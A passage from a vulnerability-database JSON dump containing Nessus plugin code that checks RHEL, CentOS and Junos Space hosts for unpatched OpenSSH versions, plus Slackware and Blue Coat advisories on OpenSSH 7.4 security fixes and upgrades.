script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:2029\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-askpass-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-askpass-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-cavs-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-cavs-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-clients-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-clients-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"openssh-debuginfo-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-keycat-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-keycat-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-ldap-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-ldap-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-server-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-server-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssh-server-sysvinit-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssh-server-sysvinit-7.4p1-11.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"pam_ssh_agent_auth-0.10.3-1.11.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-cavs / openssh-clients / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:31:33", "description": "An update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-25T00:00:00", "title": "CentOS 7 : openssh (CESA-2017:2029)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "modified": "2017-08-25T00:00:00", "cpe": ["p-cpe:/a:centos:centos:openssh-keycat", "p-cpe:/a:centos:centos:openssh-ldap", "p-cpe:/a:centos:centos:openssh", "p-cpe:/a:centos:centos:openssh-server", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:openssh-server-sysvinit", "p-cpe:/a:centos:centos:openssh-clients", "p-cpe:/a:centos:centos:openssh-askpass", "p-cpe:/a:centos:centos:openssh-cavs", "p-cpe:/a:centos:centos:pam_ssh_agent_auth"], "id": "CENTOS_RHSA-2017-2029.NASL", "href": "https://www.tenable.com/plugins/nessus/102751", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2029 and \n# CentOS Errata and Security Advisory 2017:2029 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102751);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\", \"CVE-2016-6210\", \"CVE-2016-6515\");\n script_xref(name:\"RHSA\", value:\"2017:2029\");\n\n script_name(english:\"CentOS 7 : openssh (CESA-2017:2029)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ff4711b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-6515\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-server-sysvinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-askpass-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-cavs-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-clients-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-keycat-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-ldap-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-server-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssh-server-sysvinit-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"pam_ssh_agent_auth-0.10.3-1.11.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-cavs / openssh-clients / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T03:19:40", "description": "According to its self-reported version number, the version of Junos\nSpace running on the remote device is < 18.2R1, and is therefore\naffected by multiple vulnerabilities:\n\n - Due to untrusted search path vulnerability in ssh-agent.c in ssh-agent\n in OpenSSH before 7.4, unauthenticated, remote attacker can execute execute\n arbitrary local PKCS#11 modules by leveraging control over a forwarded \n agent-socket. (CVE-2016-10009)\n \n - In OpenSSH before 7.4, an authenticated local attacker can escalate \n privileges via unspecified vectors, related to serverloop.c. \n (CVE-2016-10010)\n \n - authfile.c in sshd in OpenSSH before 7.4 does not properly consider the \n effects of realloc on buffer contents. an authenticated local attacker \n can obtain sensitive private-key information by leveraging access to a \n privilege-separated child process. (CVE-2016-10011)\n \n - In sshd in OpenSSH before 7.4, a local attacker can gain privileges by \n leveraging access to a sandboxed privilege-separation process due to a\n bounds check that's enforced by all by the shared memory manager. \n (CVE-2016-10012)\n \n - The process_open function in sftp-server.c in OpenSSH before 7.6 does not\n properly prevent write operations in readonly mode, which allows local \n attackers to create zero-length files. (CVE-2017-15906)\n \n - A reflected cross-site scripting vulnerability in OpenNMS included\n with Juniper Networks Junos Space may allow the stealing of sensitive\n information or session credentials from Junos Space administrators or\n perform administrative actions. (CVE-2018-0046)", "edition": 17, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2019-07-05T00:00:00", "title": "Juniper Junos Space < 18.2R1 Multiple Vulnerabilities (JSA10880)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2018-0046", "CVE-2017-15906", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "JUNIPER_SPACE_JSA10880.NASL", "href": "https://www.tenable.com/plugins/nessus/126510", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126510);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/07/11 12:05:35\");\n\n script_cve_id(\n \"CVE-2016-10009\",\n \"CVE-2016-10010\",\n \"CVE-2016-10011\",\n \"CVE-2016-10012\",\n \"CVE-2017-15906\",\n \"CVE-2018-0046\"\n );\n script_bugtraq_id(\n 94968,\n 94972,\n 94975,\n 94977,\n 101552,\n 105566\n );\n script_xref(name:\"JSA\", value:\"JSA10880\");\n\n script_name(english:\"Juniper Junos Space < 18.2R1 Multiple Vulnerabilities (JSA10880)\");\n script_summary(english:\"Checks the version of Junos Space.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Junos\nSpace running on the remote device is < 18.2R1, and is therefore\naffected by multiple vulnerabilities:\n\n - Due to untrusted search path vulnerability in ssh-agent.c in ssh-agent\n in OpenSSH before 7.4, unauthenticated, remote attacker can execute execute\n arbitrary local PKCS#11 modules by leveraging control over a forwarded \n agent-socket. (CVE-2016-10009)\n \n - In OpenSSH before 7.4, an authenticated local attacker can escalate \n privileges via unspecified vectors, related to serverloop.c. \n (CVE-2016-10010)\n \n - authfile.c in sshd in OpenSSH before 7.4 does not properly consider the \n effects of realloc on buffer contents. an authenticated local attacker \n can obtain sensitive private-key information by leveraging access to a \n privilege-separated child process. (CVE-2016-10011)\n \n - In sshd in OpenSSH before 7.4, a local attacker can gain privileges by \n leveraging access to a sandboxed privilege-separation process due to a\n bounds check that's enforced by all by the shared memory manager. \n (CVE-2016-10012)\n \n - The process_open function in sftp-server.c in OpenSSH before 7.6 does not\n properly prevent write operations in readonly mode, which allows local \n attackers to create zero-length files. (CVE-2017-15906)\n \n - A reflected cross-site scripting vulnerability in OpenNMS included\n with Juniper Networks Junos Space may allow the stealing of sensitive\n information or session credentials from Junos Space administrators or\n perform administrative actions. (CVE-2018-0046)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10880\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Junos Space version 18.2R1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-10009\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Junos_Space/version\");\n\n exit(0);\n}\n\ninclude('junos.inc');\ninclude('misc_func.inc');\n\nver = get_kb_item_or_exit('Host/Junos_Space/version');\n\ncheck_junos_space(ver:ver, fix:'18.2R1', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:01", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012"], "description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/openssh-7.4p1-i586-1_slack14.2.txz: Upgraded.\n This is primarily a bugfix release, and also addresses security issues.\n ssh-agent(1): Will now refuse to load PKCS#11 modules from paths outside\n a trusted whitelist.\n sshd(8): When privilege separation is disabled, forwarded Unix-domain\n sockets would be created by sshd(8) with the privileges of 'root'.\n sshd(8): Avoid theoretical leak of host private key material to\n privilege-separated child processes via realloc().\n sshd(8): The shared memory manager used by pre-authentication compression\n support had a bounds checks that could be elided by some optimising\n compilers to potentially allow attacks against the privileged monitor.\n process from the sandboxed privilege-separation process.\n sshd(8): Validate address ranges for AllowUser and DenyUsers directives at\n configuration load time and refuse to accept invalid ones. It was\n previously possible to specify invalid CIDR address ranges\n (e.g. user@127.1.2.3/55) and these would always match, possibly resulting\n in granting access where it was not intended.\n For more information, see:\n https://www.openssh.com/txt/release-7.4\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10009\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10010\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10011\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10012\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.4p1-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.4p1-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.4p1-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.4p1-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.4p1-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.4p1-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.4p1-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.4p1-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.4p1-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.4p1-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssh-7.4p1-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssh-7.4p1-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.4p1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.4p1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n7fce1ebdb63b97beaeb98f450676171c openssh-7.4p1-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n26fbf1aa33f5b289b15435a904b5d2a0 openssh-7.4p1-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n5b8a87019ca527acba1f607af9175cfb openssh-7.4p1-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n29aa129063c2667612485edeac5c072b openssh-7.4p1-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n6d9aabce1fc85756b7863cbf1cf389a9 openssh-7.4p1-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\ne57e264dccefc2621bd45838d96bb10d openssh-7.4p1-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n7613f561db6b8616ec2b0a283e4487d6 openssh-7.4p1-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n7a834d8b295da5ea88bac1340e359711 openssh-7.4p1-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n45c8e0c84e13d0c0a9914087898cefbd openssh-7.4p1-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n8e66d220fb2c3da97bf912a487436ac6 openssh-7.4p1-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n690e285ce2aeeee6f670451034ae3ec6 openssh-7.4p1-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n6a2b3846149a9f8071f2751aed452f53 openssh-7.4p1-x86_64-1_slack14.2.txz\n\nSlackware -current package:\ne0d8576b19ebe4da64f5d72474693295 n/openssh-7.4p1-i586-1.txz\n\nSlackware x86_64 -current package:\n1a8bbe8129a9c28fb9eb98b202646b46 n/openssh-7.4p1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg openssh-7.4p1-i586-1_slack14.2.txz\n\nNext, restart the sshd daemon:\n > sh /etc/rc.d/rc.sshd restart", "modified": "2016-12-24T01:35:34", "published": "2016-12-24T01:35:34", "id": "SSA-2016-358-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.647637", "type": "slackware", "title": "[slackware-security] openssh", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2021-01-13T08:42:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012"], "description": "### SUMMARY\n\nBlue Coat products using affected versions of OpenSSH are susceptible to several vulnerabilities. A remote attacker with access to an SSH server can exploit these vulnerabilities to execute arbitrary code on an SSH client. A local attacker can also exploit these vulnerabilities to obtain private key information and escalate their privileges on the system. \n \n\n\n### AFFECTED PRODUCTS\n\nThe following products are vulnerable:\n\n**Director** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 6.1 | Upgrade to a version of MC with the fixes. \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011 \nCVE-2016-10012 | 4.2 | Upgrade to 4.2.12. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.4 and later | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to later release with fixes. \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10012, CVE-2016-10011 | 5.3 | A fix will not be provided. \n \n 